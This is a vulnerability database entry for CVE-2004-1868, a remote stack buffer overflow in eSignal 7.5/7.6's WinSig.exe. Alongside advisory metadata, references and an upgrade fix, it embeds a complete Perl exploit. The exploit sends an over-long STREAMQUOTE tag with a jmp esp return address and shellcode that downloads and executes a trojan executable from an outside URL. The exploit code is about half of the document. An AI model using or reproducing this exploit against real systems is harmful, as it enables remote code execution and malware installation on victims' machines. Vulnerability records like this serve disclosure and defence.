CVE-2004-1868
CVSS 7.5
Published: 2004-03-25 00:00:00
Revised: 2016-10-17 23:02:02

[Original] Stack-based buffer overflow in WinSig.exe in eSignal 7.5 and 7.6 allows remote attackers to execute arbitrary code via a long STREAMQUOTE tag.


[CNNVD] eSignal Remote Buffer Overflow Vulnerability (CNNVD-200403-108)

eSignal is a system that provides real-time financial and securities information.
The "WinSig.exe" application included with eSignal has a flaw in its handling of data requests; a remote attacker can exploit this vulnerability to mount a buffer overflow attack and may execute arbitrary instructions on the system with the privileges of the process.
Submitting an over-long request to port 80, on which "WinSig.exe" listens, triggers a classic buffer overflow when the parameter string exceeds 1040 characters; carefully crafted request data may allow arbitrary instructions to be executed on the system with the privileges of the process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:esignal:esignal:7.5
cpe:/a:esignal:esignal:7.6

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1868
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1868
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200403-108
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2004-04/0056.html
(PATCH)  BUGTRAQ  20040406 Re: eSignal v7 remote buffer overflow
http://marc.info/?l=bugtraq&m=108025234317408&w=2
(UNKNOWN)  BUGTRAQ  20040325 eSignal v7 remote buffer overflow (exploit)
http://viziblesoft.com/insect/advisories/vz012004-esignal7.txt
(VENDOR_ADVISORY)  MISC  http://viziblesoft.com/insect/advisories/vz012004-esignal7.txt
http://www.securityfocus.com/bid/9978
(VENDOR_ADVISORY)  BID  9978
http://xforce.iss.net/xforce/xfdb/15624
(VENDOR_ADVISORY)  XF  esignal-specs-bo(15624)

- Vulnerability information

eSignal Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2004-03-25 00:00:00 2005-10-20 00:00:00
Remote

- Advisory and patches

Vendor patch:
eSignal
-------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.esignal.com/

- Vulnerability information (166)

eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit (EDBID:166)
windows remote
2004-03-26 Verified
80 VizibleSoft
N/A
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#

use IO::Socket;

sub usage 
{
   die("\nUsage: perl $0 host port\n");
}

print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";

my $ip      = $ARGV[0] || usage();
my $port    = $ARGV[1] || usage();
my $data    = "";
my $ret     = "\xf3\x7b\x20\x7c";	# MFC71.dll "jmp esp"
my $nop     = "\x90";

#
# Used api..
#

$api  = "\x00wininet.dll\x00InternetOpenA\x00".
	"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
	"_lcreat\x00_lwrite\x00_lclose\x00";

#
# Url of file to execute
#

$url = "http://viziblesoft.com/insect/sploits/troy.exe";

#
#
# Filename for our file on remote system

$fname = "setup.exe";

#
#
# Shellcode: downloads and executes file at URL
#

$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";

$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";

#
# xor data block
#

$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
		$data = $data . (substr($url, $i, 1) ^ "\xff"); 
	};

$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";

#
# construct overflow string...
#

$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));

$shellcode = $nop x (8 * 16) .
	     $shellc .
	     $ret .
	     $movsb .
	     $nop x (191-16);


# print "shellcode len: " . length($shellcode) . "\r\n";

$data = '<STREAMQUOTE>' . $shellcode . 	'</STREAMQUOTE>';

# print "sending data of len: " . length($data) . "\n";

print sendraw($data);

print "[+] Overflow sent / file executed!\n";
exit;

sub sendraw {
        my ($pstr)=@_;
        my $target;
        $target= inet_aton($ip) || die("[-] inet_aton problems");
        socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                select(S);              $|=1;
                print $pstr;            my @in=<S>;
                select(STDOUT);         close(S);
                return @in;
        } else { die("[-] Can't connect...\n"); }}

# milw0rm.com [2004-03-26]

- Vulnerability information

4583
eSignal STREAMQUOTE Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

2004-03-26 Unknown
2006-07-14 2004-04-06

- Solution

Upgrade to version 7.6 release 3, build 636a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete